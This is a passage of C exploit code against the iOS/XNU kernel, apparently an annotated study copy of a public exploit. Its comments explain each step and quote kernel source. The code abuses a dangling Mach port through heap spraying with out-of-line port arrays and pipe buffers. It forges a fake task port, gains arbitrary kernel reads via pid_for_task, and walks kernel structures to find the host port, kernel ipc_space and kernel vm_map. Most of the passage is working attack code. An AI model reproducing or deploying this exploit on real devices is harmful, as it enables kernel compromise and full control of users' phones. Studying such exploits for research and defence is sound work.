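uint8_t buf[0xfff];
memset(buf, 0x41, sizeof(buf));
write(fds[1], buf, 0xfff);                        // pipespace() -> kalloc(0x1000), fully controlled contents
// the kalloc buffer stays alive as long as the pipe is open, and can be rewritten in place:
uint8_t scratch[0xfff];
read(fds[0], scratch, 0xfff);                     // drain the pipe (the kernel buffer is NOT freed)
write(fds[1], buf, 0xfff);                        // same kalloc.4096 chunk, new contents
*/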
uint8_t* pipe_buf = malloc(0x1000);
memset(pipe_buf, 0, 0x1000);
// This "pipe_target_kaddr_offset" is the distance from the canary ipc_port(from the middle_ports array) to a target page where we are attempting to load
// user controlled data. This user controlled data will be loaded into kernel memory via the aforementioned pipe kalloc primitive.
// But why is it ofsetting 0x10000? Because remember this from way above?
// int HOP_BACK = kernel_page_size == 0x4000 ? 16 : 30;
// This means that the interleaving kalloc.16 and ipc_port pages will have been sprayed 0x1000 * 30 * (3+1) times, which is 0x78000. You see, it's just picking up an
// appropriate medium value within that range. But then another questions arises. Didn't the kalloc.16 chunks not become deallocated? Yes they are still in memory,
// so basically, the kernel memory has a whole bunch of kalloc.16 pages, with interleaving 1Page sized OOL port arrays sprayed during the GC initiating loop above.
// But if you think about it, the interleaving pages are always in the same order. A | B | A | B | A | B | A | B ... Let's say A is the pages containing ipc_port.
// A + 0x2000 will also point to a ipc_port page. And all A + 0x2000 * n will point to an ipc_port page. Hence, A + 0x10000 will also point to an ipc_port page.
// This is why the repeating order is also important. This offset assumes that the order is not skewed, or could be skewed but skewed in an even number of times.
uint64_t pipe_target_kaddr_offset = kernel_page_size == 0x4000 ? 0x20000 : 0x10000;
// Aligning it to the beginning of the page, so we can calculate the start of the target page
uint64_t pipe_target_kaddr = (canary_port_kaddr + pipe_target_kaddr_offset) & (~0xfffULL); // 0x10000
printf("pipe_target_kaddr: %016llx\n", pipe_target_kaddr);
// Building a fake arbitrary read task port, but this isn't really used so skip this piece of code
build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, 0);
// now go through each of the hold_kalloc messages and receive them.
// check if they contained the canary port
// reallocate them
// This is just a refiller that refills the 1MB worth of GC pages that seem irrelevant to the searching process.
mach_port_t secondary_leaker_ports[200] = {0};
struct {
mach_msg_header_t hdr;
mach_msg_body_t body;
// It respects the size of the 1MB spray OOL port descriptors that were used during GC.
// gc_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, replacer_object);
// We're trying to deallocate these by mach_msg receiving them, then refill those pages with pipe buffers.
mach_msg_ool_ports_descriptor_t ool_ports[0x1f];
mach_msg_trailer_t trailer;
char pad[1000];
} msg = {0};
printf("sizeof(msg) 0x%x\n", sizeof(msg));
// An indicator that the dangling port is found. This dangling port is different from the target dangling port. I'll call this new one the canary dangling port.
// The canary dangling port is the one that is stored in the GC OOL arrays, and the one we skewed with 0xa8 a couple lines above.
int hit_dangler = 0;
// This is the total amount of pipe sprays. It only iterates 14 times, because the total kernel space for pipe buffers is limited.
// I think the limit is loosely related to the 10240 RLIMIT_NOFILE hard limit that was set in the very beginning.
// That's why it stops after 14 dangler hits; by that point, around 6000 file descriptors will have been created.
int dangler_hits = 0;
printf("the canary port is: %x\n", canary_port);
// This is going to eventually store the found skewed port that has been returned to userspace
mach_port_t fake_canary_port = MACH_PORT_NULL;
// n_gc_ports = 250
// We're going to iterate through every GC OOL arrays that we sprayed, and do something with it.
for (int i = 0; i < n_gc_ports; i++) {
mach_port_t gc_port = gc_ports[i];
// We actually sent 8 messages per spray, so go through them all
for (int j = 0; j < 8; j++) {
// It's receiving the message. This is going to deallocate the kernel memory allocated for these OOL arrays.
// And it's going to convert the ipc_port kernel addresses into userspace mach_port names, and return it to userland
err = mach_msg(&msg.hdr,
MACH_RCV_MSG,
0,
sizeof(msg),
gc_port,
0,
0);
if (err != KERN_SUCCESS) {
printf("failed to receive OOL_PORTS message (%d,%d) %s\n", i, j, mach_error_string(err));
}
// check each of the canary ports:
for (int k = 0; k < 0x1f; k++) {
mach_port_t* ool_ports = msg.ool_ports[k].address;
// We only set one single port in this 0x200 * 8 sized array(The one that is in the same offset of ipc_port->ip_context). Directly get the port name from that offset.
mach_port_t tester_port = ool_ports[koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)/8];
// Remember, we skewed one of the ipc_port kernel address by 0xa8. Hence, the new address is going to point to the next ipc_port object right after the canary ipc_port object.
// When the kernel converts the kernel ipc_object back to a userspace name, it consults ipc_space->is_table and accesses a different ipc_entry from the canary port's entry,
// and it generates a userspace port_name based on that ipc_entry and stores it into the OOL array that's returned to userspace.
// What this means is the returned port will not be the canary_port, but a different port, seemingly random, from within the page's worth of hold_ports!
if (tester_port != canary_port) {
// Something to remember is that the GC ool_ports that overlapped the first target dangling port is now mach_msg received and hence freed. This target dangling port
// containing page will be overwritten again with pipe buffers, to create more type confusion and more useful primitives.
printf("found the mis-matching OOL discriptor (%x)\n", tester_port);
// We now know that we found the GC OOL descriptor that's responsible for holding the misaligned ipc_port. Mark it.
hit_dangler = 1;
// We store this for later, because the kernel has marked(increased reference) this skewed port instead of the canary port before it returned it to userspace.
// We're going to have to account for this and clean it up later so it won't cause any issues.
fake_canary_port = tester_port;
} else {
// drop the UREF
//
// Decrease the reference count by 1. In the end, all of canary_port's references will be dropped except for 2: the one from the hold array, and the one that should have been dropped here but that the misaligned port picked up instead.
mach_port_deallocate(mach_task_self(), tester_port);
}
}
}
if (!hit_dangler) {
// if we haven't yet hit the dangler, try to reallocate this memory:
//
// Assuming that the new pages are allocated in consecutive order, all the pages in front of the canary_port are irrelevant, because the final goal of this
// for loop is to allocate a user controlled memory chunk that is 0x10000 bytes past the canary_port.
secondary_leaker_ports[i] = hold_kallocs(0x1000, 0x1f, 8, MACH_PORT_NULL, NULL);
} else {
if (dangler_hits == 14) {
// we'll run out of pipe kva so stop now
printf("hopefully that's enough pipes\n");
break;
}
for (int i = 0; i < (0x1f*8); i++) {
// we have hit the dangler; from now on out we'll realloc with pipes
// pipe memory is limited
//
// ↑ Like he said, he's going to refill the memory with pipes, because pipes have full control on the user content as opposed to OOL port descriptors.
int fds[2] = {0};
// Create a pipe
int err = pipe(fds);
if (err != 0) {
perror("pipe failed\n");
}
int read_end = fds[0];
int write_end = fds[1];
// The reason why we're setting the O_NONBLOCK flag is to let the write return immediately. If this were not the case, then we would have to create tons of
// threads that would block on the pipe write, but luckily, this flag does the trick.
int flags = fcntl(write_end, F_GETFL);
flags |= O_NONBLOCK;
fcntl(write_end, F_SETFL, flags);
// This will build a fake task port, with the task->kobject pointing to "pipe_target_kaddr+0x100". This is assuming that pipe_target_kaddr, which is
// canary_port page + 0x10000 will be deallocated and refilled with the pipe buffer. It boils down to the question : Will there be a
// GC ool descriptors array allocated in that region, and will it be hit within 14 iterations? If the OOL page is placed there, then the refilling will most likely succeed.
// The target read address is set to "pipe_target_kaddr" itself.
// One thing to note here is that "next_pipe_index" is being passed in to the function and set into the fake port's ipc_port->ip_context
// This will later be used to find exactly which pipe's buffer is pointing to the first dangling pointer's replaced page.
build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, next_pipe_index);
// The write will immediately return courtesy of the O_NONBLOCK flag.
// As long as the pipe isn't closed, the kalloced memory with controlled data is live throughout the whole program.
// This is especially interesting because this means that you can have the pipe kalloc buffer stay at a fixed location, and by reading/writing, you can
// constantly change data in those kalloced buffers. A perfect kernel arbitrary data loading primitive, provided there is a way to find these pipe buffer addresses.
ssize_t amount_written = write(write_end, pipe_buf, 0xfff);
if (amount_written != 0xfff) {
printf("amount written was short: 0x%x\n", amount_written);
}
// Stashing away the read/write pipe fds to use later to set up stronger primitives.
read_ends[next_pipe_index] = read_end;
write_ends[next_pipe_index++] = write_end;
}
dangler_hits++;
}
}
printf("replaced with pipes hopefully... take a look\n");
// check the kernel object type of the dangling port:
int otype = 0;
mach_vm_address_t oaddr = 0;
// How does mach_port_kobject() react to a fake port built above?
/*
kern_return_t
mach_port_kobject(
ipc_space_t space,
mach_port_name_t name,
natural_t *typep,
mach_vm_address_t *addrp)
{
ipc_entry_t entry;
ipc_port_t port;
kern_return_t kr;
mach_vm_address_t kaddr;
// passes
if (space == IS_NULL)
return KERN_INVALID_TASK;
// passes
kr = ipc_right_lookup_read(space, name, &entry);
if (kr != KERN_SUCCESS)
return kr;
// passes
if ((entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE) == 0) {
is_read_unlock(space);
return KERN_INVALID_RIGHT;
}
__IGNORE_WCASTALIGN(port = (ipc_port_t) entry->ie_object);
// Even if this assert was alive it passes
assert(port != IP_NULL);
ip_lock(port);
is_read_unlock(space);
// passes
if (!ip_active(port)) {
ip_unlock(port);
return KERN_INVALID_RIGHT;
}
// #define ip_kotype(port) io_kotype(&(port)->ip_object)
// #define io_kotype(io) ((io)->io_bits & IO_BITS_KOTYPE)
// It simply returns the port type of our fake port object. Since we set it up as "IKOT_TASK", that's what should be returned.
*typep = (unsigned int) ip_kotype(port);
kaddr = (mach_vm_address_t)port->ip_kobject;
ip_unlock(port);
...
return KERN_SUCCESS;
}
*/
err = mach_port_kobject(mach_task_self(), target_port, &otype, &oaddr);
if (err != KERN_SUCCESS) {
// This means that our first dangling port containing page didn't get refilled with pipes. That should be a rare case, although very possible because
// pipes themselves create internal structs used for pipe operations, and those could have filled up this dangling port page.
printf("mach_port_kobject failed: %x %s\n", err, mach_error_string(err));
}
// It should print 2(IKOT_TASK), otherwise, something is wrong.
printf("dangling port type: %x\n", otype);
uint64_t replacer_pipe_index = 0xfffffff;
// As mentioned above, the pipe index that controls the fake port's page is pegged into ipc_port->ip_context. We could easily retrieve it with "mach_port_get_context".
err = mach_port_get_context(mach_task_self(), target_port, &replacer_pipe_index);
printf("got replaced with pipe fd index %d\n", replacer_pipe_index);
printf("gonna try a read...\n");
// Let's try reading an arbitrary address. That address was actually set to "pipe_target_kaddr" in the above loop.
uint32_t val = 0;
// This is actually testing whether pipe_target_kaddr(canary_port page + 0x10000) has been successfully refilled with our pipe bufs. The fake
// port's ip_kobject points at pipe_target_kaddr+0x100 and its initial read address is pipe_target_kaddr itself, so the read only works if our data really landed there.
err = pid_for_task(target_port, &val);
if (err != KERN_SUCCESS) {
printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
}
// It should print 0x80000002(IO_BITS_ACTIVE | IKOT_TASK) because that's what's stored at offset 0 of the fake task port.
// If it passed through here without a panic, then the pipe refilling technique actually worked on both target pages!
printf("read val via pid_for_task: %08x\n", val);
// at this point we know:
// * which pipe fd overlaps with the dangling port
// * the kernel address of the canary port (which is still a dangling port)
// * the kernel address of the fake task (which is a pipe buffer, but we don't know which one)
// things will be easier if we can learn the address of the dangling port giving us the address of the pipe buffer and a what/where primitive
// we could hack around that by always rewriting all the pipes each time I guess...
// for each pipe, apart from the one which we know overlaps with the port, replace the field which determines where to read from, then do the kernel read and see if the value is no longer 0x80000002
char* old_contents = malloc(0xfff);
char* new_contents = malloc(0xfff);
int pipe_target_kaddr_replacer_index = -1;
// What this loop is trying to do, is to find the pipe index for the pipe buffer that controls the "pipe_target_kaddr(canary_port page + 0x10000)" page
for (int i = 0; i < next_pipe_index; i++) {
// We don't want to mess up the fake ipc_port. Leave it alone.
if (i == replacer_pipe_index) {
continue;
}
// Drain it, so the write below will go through again
read(read_ends[i], old_contents, 0xfff);
// This time, build a fake ipc_port and set it up to read a different address(pipe_target_kaddr+4).
build_fake_task_port(new_contents, pipe_target_kaddr, pipe_target_kaddr+4, 0, 0, 0);
// Refill the buffer with the new fake port
write(write_ends[i], new_contents, 0xfff);
// try the read, did it change?
uint32_t val = 0;
// This time around it's reading from "pipe_target_kaddr+4", which corresponds to 0xf00d.
err = pid_for_task(target_port, &val);
if (err != KERN_SUCCESS) {
printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
}
printf("read val via pid_for_task: %08x\n", val);
// If 0xf00d was read, then it means the current pipe index has actually changed the contents in the pipe_target_kaddr.
// It means the current pipe index controls the page of pipe_target_kaddr.
if (val != 0x80000002) {
printf("replacer fd index %d is at the pipe_target_kaddr\n", i);
// We found the pipe index that corresponds to "pipe_target_kaddr". Save it so we can constantly meddle with it later
pipe_target_kaddr_replacer_index = i;
break;
}
}
free(old_contents);
free(new_contents);
if (pipe_target_kaddr_replacer_index == -1) {
printf("failed to find the pipe_target_kaddr_replacer pipe\n");
}
// At this point we can create a fake ipc_port and a fake task object. We still need a couple more ingredients to construct a full-fledged kernel task port though.
// With the current ingredients at hand, we only have an arbitrary address read (AAR) over memory.
// now we know which pipe fd matches up with where the fake task is so
// bootstrap the early read primitives
// Setting up some global vars so we can conveniently read DWORD/QWORD values via "early_rk{32,64}()".
prepare_early_read_primitive(target_port, read_ends[pipe_target_kaddr_replacer_index], write_ends[pipe_target_kaddr_replacer_index], pipe_target_kaddr);
// we can now use early_rk{32,64}
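// For intuition, a minimal sketch(assumed, based on build_fake_task_port() and the pid_for_task trick;
// variable names here are illustrative, the real implementation lives behind prepare_early_read_primitive())
// of what early_rk32 presumably boils down to. er_port is the dangling target_port, er_read_fd/er_write_fd
// are the pipe ends overlapping pipe_target_kaddr's page, and er_fake_port_kaddr is pipe_target_kaddr:
/*
uint32_t early_rk32_sketch(uint64_t kaddr) {
    uint8_t buf[0x1000];
    read(er_read_fd, buf, 0xfff);                  // drain the pipe so the next write goes through
    // rebuild the fake port + fake task in place; the fake task's bsd_info ends up pointing
    // at kaddr minus the p_pid offset, so pid_for_task() will fetch *(uint32_t*)kaddr as the "pid"
    build_fake_task_port(buf, er_fake_port_kaddr, kaddr, 0, 0, 0);
    write(er_write_fd, buf, 0xfff);                // same kernel pipe buffer, new contents
    uint32_t val = 0;
    pid_for_task(er_port, &val);
    return val;
}
// early_rk64() is then presumably just two adjacent early_rk32() reads stitched together.
*/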
// send a message to the canary port containing a send right to the host port;
// use the arbitrary read to find that, and from there find the kernel task port
// The canary port is still alive so we can use it to do different things.
mach_msg_header_t host_msg = {0};
host_msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, MACH_MSG_TYPE_COPY_SEND);
host_msg.msgh_size = sizeof(host_msg);
host_msg.msgh_remote_port = canary_port;
host_msg.msgh_local_port = mach_host_self();
host_msg.msgh_id = 0x12344321;
// If you follow the flow of mach_msg,
// mach_msg -> ......sleh_synchronous, handle_svc, mach_syscall, etc...... -> mach_msg_overwrite_trap -> ipc_kmsg_send -> ipc_mqueue_send -> ipc_mqueue_post -> ipc_kmsg_enqueue_qos
// then you can see that the kmsgs are being queued into
// ipc_port.ip_messages.messages->ipc_kmsg
// ... I fixed this part after following Ian's suggestion. Thanks a lot Ian! :)
//
// To understand how a userspace created message is handled into the kernel, we need to see how it's actually constructed inside the kernel.
// mach_msg -> mach_msg_overwrite_trap -> ipc_kmsg_get
// ipc_kmsg_get() holds all the core logic. Let's dig into this :
/*
struct ipc_kmsg {
mach_msg_size_t ikm_size;
struct ipc_kmsg *ikm_next;
struct ipc_kmsg *ikm_prev;
mach_msg_header_t *ikm_header;
ipc_port_t ikm_prealloc;
ipc_port_t ikm_voucher;
mach_msg_priority_t ikm_qos;
mach_msg_priority_t ikm_qos_override;
struct ipc_importance_elem *ikm_importance;
queue_chain_t ikm_inheritance;
sync_qos_count_t sync_qos[THREAD_QOS_LAST];
sync_qos_count_t special_port_qos;
};
mach_msg_return_t
ipc_kmsg_get(
// Our userspace address of the message is in msg_addr
mach_vm_address_t msg_addr,
mach_msg_size_t size,
ipc_kmsg_t *kmsgp)
{
mach_msg_size_t msg_and_trailer_size;
// This object will hold a copy of the userspace message. There will be some kind of rearrangement though, which will be explained later.
ipc_kmsg_t kmsg;
// There is also a trailer, appended at the very end of the kmsg
mach_msg_max_trailer_t *trailer;
mach_msg_legacy_base_t legacy_base;
mach_msg_size_t len_copied;
legacy_base.body.msgh_descriptor_count = 0;
...
// Let's just consider a simple case
//
/*
struct {
mach_msg_header_t hdr;
mach_msg_body_t body;
} my_msg = {0};
* /
// It contains a header & a body so it's going to fall into the else case
if(size == sizeof(mach_msg_legacy_header_t))
len_copied = sizeof(mach_msg_legacy_header_t);
else
// len_copied set to the size of the mach_msg_header + mach_msg_body
len_copied = sizeof(mach_msg_legacy_base_t);
// The header has been copied into legacy_base(which is a stack variable)
if (copyinmsg(msg_addr, (char *)&legacy_base, len_copied))
return MACH_SEND_INVALID_DATA;
...
// "msg_addr" now points to the mach_msg_body
msg_addr += sizeof(legacy_base.header);
...
// The kernel version of a mach message actually has its own kernel message header, and something called a message trailer.
// A trailer can contain various things depending on how the kernel mach message is used, for instance, security tokens plus the trailer type and size.
// The current mach message's size(passed down as a parameter from the user's mach_msg() call) gets something called MAX_TRAILER_SIZE added to it.
// Trailers come in various formats that differ in size. It assumes the trailer size to be the biggest of all possible trailers, and adds that to the message.
msg_and_trailer_size = size + MAX_TRAILER_SIZE;
// We need to dig into this function to see how the kernel mach message is constructed
kmsg = ipc_kmsg_alloc(msg_and_trailer_size);
/*
ipc_kmsg_t
ipc_kmsg_alloc(
mach_msg_size_t msg_and_trailer_size)
{
mach_msg_size_t max_expanded_size;
ipc_kmsg_t kmsg;
mach_msg_size_t size = msg_and_trailer_size - MAX_TRAILER_SIZE;
...
// This is the case where the mach message contains OOL descriptors. The calculation here always confuses me whenever I see it, but we'll skip it
// cause we're now dealing with simple messages with only a header & body.
if (size > sizeof(mach_msg_base_t)) {
...
} else
// This is being set to "msg size + MAX_TRAILER_SIZE"
max_expanded_size = msg_and_trailer_size;
// But if the message is a simple message and less than IKM_SAVED_MSG_SIZE(256 - kmsg header size), then it's being rounded up to IKM_SAVED_MSG_SIZE
if (max_expanded_size < IKM_SAVED_MSG_SIZE)
max_expanded_size = IKM_SAVED_MSG_SIZE;
// It falls through this if case
if (max_expanded_size == IKM_SAVED_MSG_SIZE) {
struct ikm_cache *cache;
unsigned int i;
disable_preemption();
// It first searches through the per processor cache of kmsg objects to see if one is available
cache = &PROCESSOR_DATA(current_processor(), ikm_cache);
if ((i = cache->avail) > 0) {
assert(i <= IKM_STASH);
kmsg = cache->entries[--i];
cache->avail = i;
enable_preemption();
ikm_check_init(kmsg, max_expanded_size);
ikm_set_header(kmsg, msg_and_trailer_size);
return (kmsg);
}
enable_preemption();
// Let's assume it doesn't find one and allocates a new chunk. It zallocs from ipc_kmsg_zone, which is a special zone that stores cacheable ipc_kmsg
// chunks, and the size of each chunk is 0x100.
kmsg = (ipc_kmsg_t)zalloc(ipc_kmsg_zone);
} else {
kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
}
if (kmsg != IKM_NULL) {
/*
#define ikm_init(kmsg, size) \
MACRO_BEGIN \
(kmsg)->ikm_size = (size); \
(kmsg)->ikm_prealloc = IP_NULL; \
(kmsg)->ikm_voucher = IP_NULL; \
(kmsg)->ikm_importance = IIE_NULL; \
ikm_qos_init(kmsg); \
ikm_flipc_init(kmsg); \
assert((kmsg)->ikm_prev = (kmsg)->ikm_next = IKM_BOGUS); \
MACRO_END
* /
// This is basically just a macro that sets the header of the kernel mach message. It sets "(kmsg)->ikm_size" to (256 - kmsg header size)
ikm_init(kmsg, max_expanded_size);
/*
#define ikm_set_header(kmsg, mtsize) \
MACRO_BEGIN \
(kmsg)->ikm_header = (mach_msg_header_t *) \
((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \
MACRO_END
* /
// Now this is rather weird at first glance... What it's doing is setting a pointer to an address within the kernel
// mach message object, positioned so that the entire user mode mach message can be copied into the kernel mach message object(kmsg).
// It accounts for both the user mach message and the trailer being situated at the end of the kmsg object.
// This might be confusing now, but let's just return to "ipc_kmsg_get" for now.
ikm_set_header(kmsg, msg_and_trailer_size);
}
return(kmsg);
}
* /
// resuming here...
if (kmsg == IKM_NULL)
return MACH_SEND_NO_BUFFER;
// Remember, kmsg->ikm_header is pointing to an offset within the kmsg object, which is carefully calculated to point the user mach message(that's soon going to be copied)
// It is really confusing how the object is laid out at first, so here's a simple diagram :
// | kmsg header | some slack space | user mach_msg_header | user mach_msg_body | kmsg_trailer |
// All of the above calculation is to ensure that the object is laid out this way, aligning the end of the kmsg_trailer to the end of the kmsg object.
// Therefore, the slack space between the kmsg header and the user mach_msg_header is variable, with the other important objects shoved up against each boundary edge of the kmsg object.
// A little more graphical representation can be found on the Ian Beer's Project Zero blog : https://googleprojectzero.blogspot.com/2017/04/exception-oriented-exploitation-on-ios.html
// It's copying the user mach_msg_header fields one by one into the kmsg object.
kmsg->ikm_header->msgh_size = size;
kmsg->ikm_header->msgh_bits = legacy_base.header.msgh_bits;
kmsg->ikm_header->msgh_remote_port = CAST_MACH_NAME_TO_PORT(legacy_base.header.msgh_remote_port);
kmsg->ikm_header->msgh_local_port = CAST_MACH_NAME_TO_PORT(legacy_base.header.msgh_local_port); <- This is what "0xac" means! :)
kmsg->ikm_header->msgh_voucher_port = legacy_base.header.msgh_voucher_port;
kmsg->ikm_header->msgh_id = legacy_base.header.msgh_id;
...
// Now, it's copying the mach_msg_body into the kmsg object
if (copyinmsg(msg_addr, (char *)(kmsg->ikm_header + 1), size - (mach_msg_size_t)sizeof(mach_msg_header_t))) {
ipc_kmsg_free(kmsg);
return MACH_SEND_INVALID_DATA;
}
...
...
...
// And finally, it's setting the trailer at the very end of the kmsg. Phew! Now we completely understand the weird layout of kernel ipc objects.
trailer = (mach_msg_max_trailer_t *) ((vm_offset_t)kmsg->ikm_header + size);
trailer->msgh_sender = current_thread()->task->sec_token;
trailer->msgh_audit = current_thread()->task->audit_token;
trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;
*/
err = mach_msg(&host_msg,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
sizeof(host_msg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("failed to send host message to canary port %s\n", mach_error_string(err));
//exit(EXIT_FAILURE);
}
printf("sent host_msg to canary port, let's find it and locate the host port\n");
// It's picking up "ipc_port.ip_messages.messages->messages[0]", which is the first kmsg enqued in the kernel mach message queue.
uint64_t host_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
printf("host_kmsg: %016llx\n", host_kmsg);
// hexdump the kmsg:
//for (int i = 0; i < 100; i++) {
// uint64_t val = early_rk64(host_kmsg + (i*8));
// printf("%016llx: %016llx\n", host_kmsg + (i*8), val);
//}
// It's picking up "kmsg->ikm_header->msgh_local_port", which is the host port's ipc_port object!
uint64_t host_port_kaddr = early_rk64(host_kmsg + 0xac); // could parse the message to find this rather than hardcode
// do the same thing again to get our task port:
discard_message(canary_port);
// This time it's setting the msg.msgh_local_port to the current task's port
host_msg.msgh_local_port = mach_task_self();
err = mach_msg(&host_msg,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
sizeof(host_msg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("failed to send host message to canary port %s\n", mach_error_string(err));
//exit(EXIT_FAILURE);
}
printf("sent task_msg to canary port, let's find it and locate the host port\n");
uint64_t task_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
printf("task_kmsg: %016llx\n", task_kmsg);
// It's picking up "kmsg->ikm_header->msgh_local_port", which is the current task's ipc_port object
uint64_t task_port_kaddr = early_rk64(host_kmsg + 0xac);
printf("our task port is at %016llx\n", task_port_kaddr);
// now we can copy-paste some code from multi_path:
// for the full read/write primitive we need to find the kernel vm_map and the kernel ipc_space
// we can get the ipc_space easily from the host port (receiver field):
// ↑ Like Ian says, if you look at the ipc_host_init() function
/*
void ipc_host_init(void)
{
...
...
port = ipc_port_alloc_kernel();
if (port == IP_NULL)
panic("ipc_host_init");
ipc_kobject_set(port, (ipc_kobject_t) &realhost, IKOT_HOST);
kernel_set_special_port(&realhost, HOST_PORT,
ipc_port_make_send(port));
*/
// You can see how the host port is created and how its fields are set. Follow the function flow :
// ipc_port_alloc_kernel->ipc_port_alloc_special->ipc_port_init
/*
#define ipc_port_alloc_kernel() ipc_port_alloc_special(ipc_space_kernel)
void
ipc_port_init(
ipc_port_t port,
ipc_space_t space,
mach_port_name_t name)
{
port->ip_receiver = space;
port->ip_receiver_name = name;
...
...
*/
// You can see that the host port's receiver is initialized with the kernel's ipc_space
uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));
printf("ipc_space_kernel: %016llx\n", ipc_space_kernel);
// the kernel vm_map is a little trickier to find
// we can use the trick from mach_portal to find the kernel task port because we know it's gonna be near the host_port on the heap:
// ↑ To understand why this works, you need to read through Ian Beer's excellent mach_portal writeup "https://bugs.chromium.org/p/project-zero/issues/detail?id=965#c10"
// The gist of the technique is the fact that the host port gets initialized only once during system bootup, and since the host port setup is not that far from
// the kernel task port setup as seen in kernel_bootstrap() :
/*
...
...
kernel_bootstrap_log("ipc_init");
ipc_init(); <- The host port gets setup here : ipc_host_init() -> kernel_set_special_port(&realhost, HOST_PORT, ipc_port_make_send(port));
kernel_bootstrap_log("PMAP_ACTIVATE_KERNEL");
PMAP_ACTIVATE_KERNEL(master_cpu);
kernel_bootstrap_log("mapping_free_prime");
mapping_free_prime();
kernel_bootstrap_log("machine_init");
machine_init();
kernel_bootstrap_log("clock_init");
clock_init();
ledger_init();
kernel_bootstrap_log("task_init");
task_init(); <- inside here there this : "if (task_create_internal(TASK_NULL, NULL, FALSE, TRUE, TF_NONE, TPF_NONE, &kernel_task) != KERN_SUCCESS)"
...
...
*/
// So it could be assumed that the host port is very close to the kernel task port, within the same ipc_port page region
// find the start of the zone block containing the host and kernel task pointers:
// Trying to figure out which page(1st, 2nd, 3rd) the host port is lying in.
uint64_t offset = host_port_kaddr & 0xfff;
uint64_t first_port = 0;
// If it's on the first page, then the last 3 nibbles will be divisible by 0xa8. Just a reminder, the ipc_port object's size is 0xa8 bytes.
if ((offset % 0xa8) == 0) {
printf("host port is on first page\n");
first_port = host_port_kaddr & ~(0xfff);
} else if(((offset+0x1000) % 0xa8) == 0) {
// Let's say it's on the second page at offset 0x1068. Then, 0x1068 will be divisible by 0xA8.
printf("host port is on second page\n");
first_port = (host_port_kaddr-0x1000) & ~(0xfff);
} else if(((offset+0x2000) % 0xa8) == 0) {
// Same for the third page.
printf("host port is on second page\n");
first_port = (host_port_kaddr-0x2000) & ~(0xfff);
} else {
printf("hummm, my assumptions about port allocations are wrong...\n");
}
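// A worked example of the alignment math above, with made-up addresses:
//   host_port_kaddr = 0xffffffe0004a5348 -> offset = 0x348, and 0x348 % 0xa8 == 0 (0xa8 * 5),
//     so it's on the first page: first_port = 0xffffffe0004a5000
//   host_port_kaddr = 0xffffffe0004a6068 -> offset = 0x068, and (0x068 + 0x1000) % 0xa8 == 0 (0xa8 * 25),
//     so it's on the second page: first_port = (0xffffffe0004a6068 - 0x1000) & ~0xfff = 0xffffffe0004a5000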
// I guess the kernel task port is always deterministically on the first page of the early boot ipc_port region.
printf("first port is at %016llx\n", first_port);
uint64_t kernel_vm_map = 0;
// Going through every ipc_port object in the first page
for (int i = 0; i < ports_per_zcram; i++) {
uint64_t early_port_kaddr = first_port + (i*0xa8);
// Reading "ipc_port->ip_object->io_bits" and checking if it's a task's ipc_port.
uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));
// If not, then skip
if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) {
continue;
}
// get that port's kobject:
// ipc_port->ip_kobject holds the task's task object
uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
if (task_t == 0) {
printf("weird heap object with NULL kobject\n");
continue;
}
// check the pid via the bsd_info:
// Following a chain of pointers to get the process ID of the task
uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
if (bsd_info == 0) {
printf("task doesn't have a bsd info\n");
continue;
}
uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
// PID = 0 is the kernel task
if (pid != 0) {
printf("task isn't the kernel task\n");
continue;
}
// found the right task, get the vm_map
/*
struct task {
decl_lck_mtx_data(,lock)
_Atomic uint32_t ref_count;
boolean_t active;
boolean_t halting;
vm_map_t map; <- Getting this
*/
kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
break;
}
if (kernel_vm_map == 0) {
printf("unable to find the kernel task map\n");
return;
}
printf("kernel map:%016llx\n", kernel_vm_map);
// find the address of the dangling port:
// It's walking the chain task->itk_space->is_table to locate it.
uint64_t task_kaddr = early_rk64(task_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t itk_space = early_rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
uint64_t is_table = early_rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));
const int sizeof_ipc_entry_t = 0x18;
// This is how it gets the index into the is_table from the port's name(refer to "through the mach portal" p.8)
// It reads the corresponding ipc_entry, and then gets ipc_entry->ie_object which is the UAFed ipc_object that's currently overlapped with the pipe buffer that holds the fake ipc_port object
uint64_t target_port_kaddr = early_rk64(is_table + ((target_port >> 8) * sizeof_ipc_entry_t));
printf("dangling port kaddr is: %016llx\n", target_port_kaddr);
// now we have everything to build a fake kernel task port for memory r/w:
// we know which
